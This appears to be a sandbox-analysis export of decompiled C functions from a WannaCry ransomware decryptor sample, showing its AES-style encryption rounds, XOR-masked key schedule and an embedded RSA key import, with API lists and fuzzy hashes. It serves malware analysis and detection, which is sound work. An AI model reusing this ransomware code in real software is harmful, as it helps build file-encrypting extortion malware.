                                  				_t161 =  *(_t386 + 0x410);
                                  				_v36 = 0xbadbad ^  *(_t386 + 0x1f4);
                                  				_v16 = _t161;
                                  				if(_t161 > 1) {
                                  					_a4 = _t386 + 0x210;
                                  					_v20 = _t161 - 1;
                                  					do {
                                  						_t349 = _t345 & 0x000000ff;
                                  						_t187 = _a4;
                                  						_t188 = _t187 + 0x20;
                                  						_a4 = _t188;
                                  						_v40 =  *0x004189B0 ^  *0x004181B0 ^  *0x004185B0 ^  *(0x418db0 + (_t277 & 0x000000ff) * 4) ^  *(_a4 - 4);
                                  						_t277 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + (_v36 & 0x000000ff) * 4) ^  *_a4;
                                  						_t345 =  *0x004185B0 ^  *0x004189B0 ^  *0x004181B0 ^  *(0x418db0 + (_v40 & 0x000000ff) * 4) ^  *(_t188 - 0x28);
                                  						_t190 = _v20 - 1;
                                  						_v28 = _t345;
                                  						_v32 = _t277;
                                  						_v36 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + _t349 * 4) ^  *(_t187 + 4);
                                  						_v20 = _t190;
                                  					} while (_t190 != 0);
                                  					_t161 = _v16;
                                  					_t386 = _v24;
                                  				}
                                  				_t162 = _t161 << 5;
                                  				_t360 =  *(_t162 + _t386 + 0x1e8);
                                  				_t387 = _t162 + _t386 + 0x1e8;
                                  				_a4 = _t360;
                                  				_t165 = _a8;
                                  				 *_t165 =  *0x004170B0 ^ _t360 >> 0x00000018;
                                  				_t165[1] =  *0x004170B0 ^ _t360 >> 0x00000010;
                                  				_t165[2] =  *0x004170B0 ^ _t360 >> 0x00000008;
                                  				_t165[3] =  *((_v40 & 0x000000ff) + 0x4170b0) ^ _a4;
                                  				_t361 =  *(_t387 + 4);
                                  				_a4 = _t361;
                                  				_t165[4] =  *0x004170B0 ^ _t361 >> 0x00000018;
                                  				_t165[5] =  *0x004170B0 ^ _t361 >> 0x00000010;
                                  				_t165[6] =  *0x004170B0 ^ _t361 >> 0x00000008;
                                  				_t165[7] =  *((_v32 & 0x000000ff) + 0x4170b0) ^ _a4;
                                  				_t364 =  *(_t387 + 8);
                                  				_a4 = _t364;
                                  				_t165[8] =  *0x004170B0 ^ _t364 >> 0x00000018;
                                  				_t165[9] =  *0x004170B0 ^ _t364 >> 0x00000010;
                                  				_t125 = _t345 + 0x4170b0; // 0xd56a0952
                                  				_t165[0xa] =  *_t125 ^ _t364 >> 0x00000008;
                                  				_t346 = _t345 & 0x000000ff;
                                  				_t165[0xb] =  *((_v36 & 0x000000ff) + 0x4170b0) ^ _a4;
                                  				_t388 =  *(_t387 + 0xc);
                                  				_a4 = _t388;
                                  				_t165[0xc] =  *0x004170B0 ^ _t388 >> 0x00000018;
                                  				_t165[0xd] =  *0x004170B0 ^ _t388 >> 0x00000010;
                                  				_t165[0xe] =  *0x004170B0 ^ _t388 >> 0x00000008;
                                  				_t142 = _t346 + 0x4170b0; // 0xd56a0952
                                  				_t165[0xf] =  *_t142 ^ _a4;
                                  				return _t165;
                                  			}








































                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A9EA
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A9FA
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                  • Instruction ID: 04248197bcb1574b3d90ae1a3c7ae13e194e7d8d0e6a6b40a3143ad68c5bfd1a
                                  • Opcode Fuzzy Hash: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                  • Instruction Fuzzy Hash: 0AC18E3260C3D14FD305CF7994A41ABBFE2AF9E300F9E98ADE5D98B312C5609505CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E0040A610(signed int __ecx) {
                                  				signed char* _t157;
                                  				signed int _t259;
                                  				signed int _t260;
                                  				signed int _t276;
                                  				signed int _t357;
                                  				signed int _t358;
                                  				signed int _t359;
                                  				signed int _t378;
                                  				signed int _t379;
                                  				void* _t380;
                                  				signed int _t381;
                                  				signed int _t390;
                                  				signed int _t391;
                                  				void* _t392;
                                  				void* _t393;
                                  
                                  				_t391 = __ecx;
                                  				 *(_t393 + 0x18) = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push(_t393 + 0x1c);
                                  					L004130FC();
                                  				}
                                  				_t276 = 0xbadbad ^  *(_t391 + 8);
                                  				 *(_t393 + 0x18) = 0 << 0x18;
                                  				 *(_t393 + 0x14) = 0xbadbad ^  *(_t391 + 0xc);
                                  				_t259 = 0xbadbad ^  *(_t391 + 0x10);
                                  				 *(_t393 + 0x1c) = 0 << 0x18;
                                  				_t378 =  *(_t391 + 0x410);
                                  				 *(_t393 + 0x10) =  *(_t391 + 0x14) ^ 0xbadbad;
                                  				 *(_t393 + 0x20) = _t378;
                                  				if(_t378 > 1) {
                                  					_t392 = _t391 + 0x30;
                                  					 *(_t393 + 0x38) = _t378 - 1;
                                  					do {
                                  						_t392 = _t392 + 0x20;
                                  						 *(_t393 + 0x14) =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + (_t276 & 0x000000ff) * 4) ^  *(_t392 - 0x24);
                                  						 *(_t393 + 0x10) =  *0x004171B0 ^  *0x004179B0 ^  *0x004175B0 ^  *(0x417db0 + (_t259 & 0x000000ff) * 4) ^  *(_t392 - 0x1c);
                                  						_t259 =  *0x004175B0 ^  *0x004171B0 ^  *0x004179B0 ^  *(0x417db0 + ( *(_t393 + 0x14) & 0x000000ff) * 4) ^  *(_t392 - 0x20);
                                  						_t276 =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + ( *(_t393 + 0x10) & 0x000000ff) * 4) ^  *(_t392 - 0x28);
                                  						_t390 =  *(_t393 + 0x38) - 1;
                                  						 *(_t393 + 0x18) = _t276;
                                  						 *(_t393 + 0x1c) = _t259;
                                  						 *(_t393 + 0x38) = _t390;
                                  					} while (_t390 != 0);
                                  					_t378 =  *(_t393 + 0x20);
                                  					_t391 =  *((intOrPtr*)(_t393 + 0x24));
                                  				}
                                  				_t379 = _t378 << 5;
                                  				_t357 =  *(_t391 + 8 + _t379);
                                  				_t380 = _t391 + 8 + _t379;
                                  				_t157 =  *(_t393 + 0x3c);
                                  				 *_t157 =  *0x00416FB0 ^ _t357 >> 0x00000018;
                                  				 *(_t393 + 0x38) = _t357;
                                  				_t157[1] =  *0x00416FB0 ^ _t357 >> 0x00000010;
                                  				_t87 = _t259 + 0x416fb0; // 0x7b777c63
                                  				_t157[2] =  *_t87 ^ _t357 >> 0x00000008;
                                  				_t157[3] =  *(( *(_t393 + 0x10) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                  				_t358 =  *(_t380 + 4);
                                  				 *(_t393 + 0x38) = _t358;
                                  				_t157[4] =  *0x00416FB0 ^ _t358 >> 0x00000018;
                                  				_t157[5] =  *0x00416FB0 ^ _t358 >> 0x00000010;
                                  				_t157[6] =  *0x00416FB0 ^ _t358 >> 0x00000008;
                                  				_t157[7] =  *(( *(_t393 + 0x18) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                  				_t359 =  *(_t380 + 8);
                                  				 *(_t393 + 0x38) = _t359;
                                  				_t157[8] =  *0x00416FB0 ^ _t359 >> 0x00000018;
                                  				_t157[9] =  *0x00416FB0 ^ _t359 >> 0x00000010;
                                  				_t260 = _t259 & 0x000000ff;
                                  				_t157[0xa] =  *0x00416FB0 ^ _t359 >> 0x00000008;
                                  				_t157[0xb] =  *(( *(_t393 + 0x14) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                  				_t381 =  *(_t380 + 0xc);
                                  				 *(_t393 + 0x34) = _t381;
                                  				_t157[0xc] =  *0x00416FB0 ^ _t381 >> 0x00000018;
                                  				_t157[0xd] =  *0x00416FB0 ^ _t381 >> 0x00000010;
                                  				_t157[0xe] =  *0x00416FB0 ^ _t381 >> 0x00000008;
                                  				_t134 = _t260 + 0x416fb0; // 0x7b777c63
                                  				_t157[0xf] =  *_t134 ^  *(_t393 + 0x2c);
                                  				return _t157;
                                  			}



















                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A62A
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A63A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                  • Instruction ID: 24c55d493b92f0f745426086bc8efec80d3c09ac131e354686a8208b9adac079
                                  • Opcode Fuzzy Hash: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                  • Instruction Fuzzy Hash: CFC15B2260C2C24BD705CF7998E04EBFFE3AF9E204B4E95A9D5C99B322C5719409C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0040B0C0(intOrPtr __ecx) {
                                  				intOrPtr _t137;
                                  				signed int _t141;
                                  				signed int _t142;
                                  				signed int* _t144;
                                  				signed int _t145;
                                  				void* _t173;
                                  				signed int* _t189;
                                  				signed int _t192;
                                  				signed int _t196;
                                  				intOrPtr _t198;
                                  				signed char _t200;
                                  				intOrPtr _t207;
                                  				signed int _t227;
                                  				signed int _t231;
                                  				intOrPtr _t233;
                                  				intOrPtr _t262;
                                  				void* _t266;
                                  				signed int _t268;
                                  				signed int* _t270;
                                  				signed char* _t274;
                                  				signed char* _t275;
                                  				signed char* _t276;
                                  				signed char* _t277;
                                  				intOrPtr _t281;
                                  				signed int _t282;
                                  				intOrPtr _t286;
                                  				void* _t287;
                                  
                                  				_t286 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push(_t287 + 0x34);
                                  					L004130FC();
                                  				}
                                  				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
                                  				if(_t137 != 0x10) {
                                  					asm("cdq");
                                  					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
                                  					if(_t196 != 4) {
                                  						_t141 = (0 | _t196 != 0x00000006) + 1;
                                  					} else {
                                  						_t141 = 0;
                                  					}
                                  					_t142 = _t141 << 5;
                                  					_t9 = _t142 + 0x41a1dc; // 0x3
                                  					_t233 =  *_t9;
                                  					_t10 = _t142 + 0x41a1e4; // 0x2
                                  					_t198 =  *_t10;
                                  					_t11 = _t142 + 0x41a1ec; // 0x1
                                  					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
                                  					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
                                  					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
                                  					_t15 = _t286 + 0x454; // 0x4a8
                                  					_t144 = _t15;
                                  					if(_t196 > 0) {
                                  						_t282 =  *(_t287 + 0x44);
                                  						_t17 = _t286 + 0x1e8; // 0x23c
                                  						 *(_t287 + 0x10) = _t17;
                                  						 *(_t287 + 0x18) = _t196;
                                  						do {
                                  							 *_t144 = 0 << 0x18;
                                  							_t268 =  *_t144 | 0 << 0x00000010;
                                  							 *_t144 = _t268;
                                  							 *_t144 = _t268;
                                  							_t270 = _t144;
                                  							_t282 = _t282 + 4;
                                  							_t144 =  &(_t144[1]);
                                  							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
                                  							_t227 =  *(_t287 + 0x18) - 1;
                                  							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
                                  							 *(_t287 + 0x18) = _t227;
                                  						} while (_t227 != 0);
                                  						_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                  					}
                                  					_t145 = 1;
                                  					 *(_t287 + 0x1c) = 1;
                                  					if( *(_t286 + 0x410) > 1) {
                                  						_t28 = _t286 + 0x208; // 0x25c
                                  						 *(_t287 + 0x44) = _t28;
                                  						do {
                                  							if(_t196 > 0) {
                                  								_t281 = _t233;
                                  								 *(_t287 + 0x18) =  *(_t287 + 0x44);
                                  								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
                                  								_t33 = _t286 + 0x434; // 0x488
                                  								_t266 = _t33;
                                  								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
                                  								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
                                  								 *(_t287 + 0x10) = _t196;
                                  								while(1) {
                                  									_t266 = _t266 + 4;
                                  									asm("cdq");
                                  									 *(_t287 + 0x2c) = 0;
                                  									asm("cdq");
                                  									asm("cdq");
                                  									_t189 =  *(_t287 + 0x18);
                                  									 *(_t287 + 0x18) =  &(_t189[1]);
                                  									 *(_t266 - 4) =  *(0x4189b0 +  *(_t287 + 0x2c) * 4) ^  *(0x418db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004185B0 ^  *0x004181B0 ^  *_t189;
                                  									_t281 = _t281 + 1;
                                  									_t192 =  *(_t287 + 0x10) - 1;
                                  									 *(_t287 + 0x10) = _t192;
                                  									if(_t192 == 0) {
                                  										break;
                                  									}
                                  									_t207 =  *((intOrPtr*)(_t287 + 0x24));
                                  								}
                                  								_t233 =  *((intOrPtr*)(_t287 + 0x30));
                                  							}
                                  							_t79 = _t286 + 0x434; // 0x488
                                  							_t80 = _t286 + 0x454; // 0x4a8
                                  							_t173 = memcpy(_t80, _t79, _t196 << 2);
                                  							_t287 = _t287 + 0xc;
                                  							_t145 = _t173 + 1;
                                  							_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                  							 *(_t287 + 0x1c) = _t145;
                                  							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
                                  						} while (_t145 <  *(_t286 + 0x410));
                                  					}
                                  					 *(_t287 + 0x44) = 0;
                                  					if(_t196 > 0) {
                                  						_t274 =  *(_t287 + 0x48);
                                  						_t89 = _t286 + 0x454; // 0x4a8
                                  						 *(_t287 + 0x48) = _t89;
                                  						_t262 = _t198;
                                  						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
                                  						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
                                  						do {
                                  							_t200 =  *(_t286 + 0x1e8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
                                  							 *_t274 =  *0x004170B0 ^ _t200 >> 0x00000018;
                                  							_t275 =  &(_t274[1]);
                                  							asm("cdq");
                                  							 *_t275 =  *0x004170B0 ^ _t200 >> 0x00000010;
                                  							asm("cdq");
                                  							_t276 =  &(_t275[1]);
                                  							 *_t276 =  *0x004170B0 ^ _t200 >> 0x00000008;
                                  							_t277 =  &(_t276[1]);
                                  							asm("cdq");
                                  							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x4170b0) ^ _t200;
                                  							_t274 =  &(_t277[1]);
                                  							_t145 =  *(_t287 + 0x44) + 1;
                                  							_t262 = _t262 + 1;
                                  							 *(_t287 + 0x44) = _t145;
                                  							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
                                  						} while (_t145 < _t196);
                                  					}
                                  					return _t145;
                                  				} else {
                                  					return E0040A9D0(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
                                  				}
                                  			}


                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                  • Instruction ID: 635c181c6a855438023d43a1e61ad1cbf7521d36b86b6127b0536a3f97539009
                                  • Opcode Fuzzy Hash: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                  • Instruction Fuzzy Hash: 5F91AE756083858FC718CF28D8906AABBE2FFC9304F14487EE989D7351D634A945CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0040ADC0(signed int __ecx) {
                                  				intOrPtr _t137;
                                  				signed int _t141;
                                  				signed int _t142;
                                  				signed int* _t144;
                                  				signed int _t145;
                                  				void* _t173;
                                  				signed int* _t189;
                                  				signed int _t192;
                                  				signed int _t196;
                                  				intOrPtr _t198;
                                  				signed char _t200;
                                  				intOrPtr _t207;
                                  				signed int _t227;
                                  				signed int _t231;
                                  				intOrPtr _t233;
                                  				intOrPtr _t262;
                                  				void* _t266;
                                  				signed int _t268;
                                  				signed int* _t270;
                                  				signed char* _t274;
                                  				signed char* _t275;
                                  				signed char* _t276;
                                  				signed char* _t277;
                                  				intOrPtr _t281;
                                  				signed int _t282;
                                  				signed int _t286;
                                  				void* _t287;
                                  
                                  				_t286 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push(_t287 + 0x34);
                                  					L004130FC();
                                  				}
                                  				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
                                  				if(_t137 != 0x10) {
                                  					asm("cdq");
                                  					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
                                  					if(_t196 != 4) {
                                  						_t141 = (0 | _t196 != 0x00000006) + 1;
                                  					} else {
                                  						_t141 = 0;
                                  					}
                                  					_t142 = _t141 << 5;
                                  					_t9 = _t142 + 0x41a1d8; // 0x1
                                  					_t233 =  *_t9;
                                  					_t10 = _t142 + 0x41a1e0; // 0x2
                                  					_t198 =  *_t10;
                                  					_t11 = _t142 + 0x41a1e8; // 0x3
                                  					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
                                  					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
                                  					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
                                  					_t15 = _t286 + 0x454; // 0x4a8
                                  					_t144 = _t15;
                                  					if(_t196 > 0) {
                                  						_t282 =  *(_t287 + 0x44);
                                  						_t17 = _t286 + 8; // 0x5c
                                  						 *(_t287 + 0x10) = _t17;
                                  						 *(_t287 + 0x18) = _t196;
                                  						do {
                                  							 *_t144 = 0 << 0x18;
                                  							_t268 =  *_t144 | 0 << 0x00000010;
                                  							 *_t144 = _t268;
                                  							 *_t144 = _t268;
                                  							_t270 = _t144;
                                  							_t282 = _t282 + 4;
                                  							_t144 =  &(_t144[1]);
                                  							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
                                  							_t227 =  *(_t287 + 0x18) - 1;
                                  							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
                                  							 *(_t287 + 0x18) = _t227;
                                  						} while (_t227 != 0);
                                  						_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                  					}
                                  					_t145 = 1;
                                  					 *(_t287 + 0x1c) = 1;
                                  					if( *(_t286 + 0x410) > 1) {
                                  						_t28 = _t286 + 0x28; // 0x7c
                                  						 *(_t287 + 0x44) = _t28;
                                  						do {
                                  							if(_t196 > 0) {
                                  								_t281 = _t233;
                                  								 *(_t287 + 0x18) =  *(_t287 + 0x44);
                                  								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
                                  								_t33 = _t286 + 0x434; // 0x488
                                  								_t266 = _t33;
                                  								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
                                  								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
                                  								 *(_t287 + 0x10) = _t196;
                                  								while(1) {
                                  									_t266 = _t266 + 4;
                                  									asm("cdq");
                                  									 *(_t287 + 0x2c) = 0;
                                  									asm("cdq");
                                  									asm("cdq");
                                  									_t189 =  *(_t287 + 0x18);
                                  									 *(_t287 + 0x18) =  &(_t189[1]);
                                  									 *(_t266 - 4) =  *(0x4179b0 +  *(_t287 + 0x2c) * 4) ^  *(0x417db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004175B0 ^  *0x004171B0 ^  *_t189;
                                  									_t281 = _t281 + 1;
                                  									_t192 =  *(_t287 + 0x10) - 1;
                                  									 *(_t287 + 0x10) = _t192;
                                  									if(_t192 == 0) {
                                  										break;
                                  									}
                                  									_t207 =  *((intOrPtr*)(_t287 + 0x24));
                                  								}
                                  								_t233 =  *((intOrPtr*)(_t287 + 0x30));
                                  							}
                                  							_t79 = _t286 + 0x434; // 0x488
                                  							_t80 = _t286 + 0x454; // 0x4a8
                                  							_t173 = memcpy(_t80, _t79, _t196 << 2);
                                  							_t287 = _t287 + 0xc;
                                  							_t145 = _t173 + 1;
                                  							_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                  							 *(_t287 + 0x1c) = _t145;
                                  							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
                                  						} while (_t145 <  *(_t286 + 0x410));
                                  					}
                                  					 *(_t287 + 0x44) = 0;
                                  					if(_t196 > 0) {
                                  						_t274 =  *(_t287 + 0x48);
                                  						_t89 = _t286 + 0x454; // 0x4a8
                                  						 *(_t287 + 0x48) = _t89;
                                  						_t262 = _t198;
                                  						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
                                  						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
                                  						do {
                                  							_t200 =  *(_t286 + 8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
                                  							 *_t274 =  *0x00416FB0 ^ _t200 >> 0x00000018;
                                  							_t275 =  &(_t274[1]);
                                  							asm("cdq");
                                  							 *_t275 =  *0x00416FB0 ^ _t200 >> 0x00000010;
                                  							asm("cdq");
                                  							_t276 =  &(_t275[1]);
                                  							 *_t276 =  *0x00416FB0 ^ _t200 >> 0x00000008;
                                  							_t277 =  &(_t276[1]);
                                  							asm("cdq");
                                  							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x416fb0) ^ _t200;
                                  							_t274 =  &(_t277[1]);
                                  							_t145 =  *(_t287 + 0x44) + 1;
                                  							_t262 = _t262 + 1;
                                  							 *(_t287 + 0x44) = _t145;
                                  							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
                                  						} while (_t145 < _t196);
                                  					}
                                  					return _t145;
                                  				} else {
                                  					return E0040A610(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
                                  				}
                                  			}

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                  • Instruction ID: 9bf03c186ab60868eb4058f96665f2b4dca6c7ab88ed953fee9cff2198bbc34e
                                  • Opcode Fuzzy Hash: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                  • Instruction Fuzzy Hash: D691BE756083858FC718CF28D8805AABBE2FFC9308F14487EE989D7351C634E956CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004046F0(void* __ecx, CHAR* _a4) {
                                  
                                  				_t25 = __ecx;
                                  				if(E004046B0(__ecx) != 0) {
                                  					_t7 = _a4;
                                  					if(_a4 != 0) {
                                  						if(E004049B0( *(__ecx + 4), __ecx + 8, _t7) != 0) {
                                  							goto L7;
                                  						} else {
                                  							E00404770(_t25);
                                  							return 0;
                                  						}
                                  					} else {
                                  						if(CryptImportKey( *(__ecx + 4), 0x420794, 0x494, 0, 0, __ecx + 8) != 0) {
                                  							L7:
                                  							return 1;
                                  						} else {
                                  							E00404770(_t25);
                                  							return 0;
                                  						}
                                  					}
                                  				} else {
                                  					E00404770(__ecx);
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                  • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
                                    • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                    • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                    • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                  • String ID:
                                  • API String ID: 3621138593-0
                                  • Opcode ID: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                  • Instruction ID: d4e90e0c2f988709a992e7d604814048f9cd1a1bd42c9a5a50fcd20aee9fd3f8
                                  • Opcode Fuzzy Hash: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                  • Instruction Fuzzy Hash: 5DF019F130425156E660E675A942F9B62998BE1B08F00483BF605E72D1EB78EC42829C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
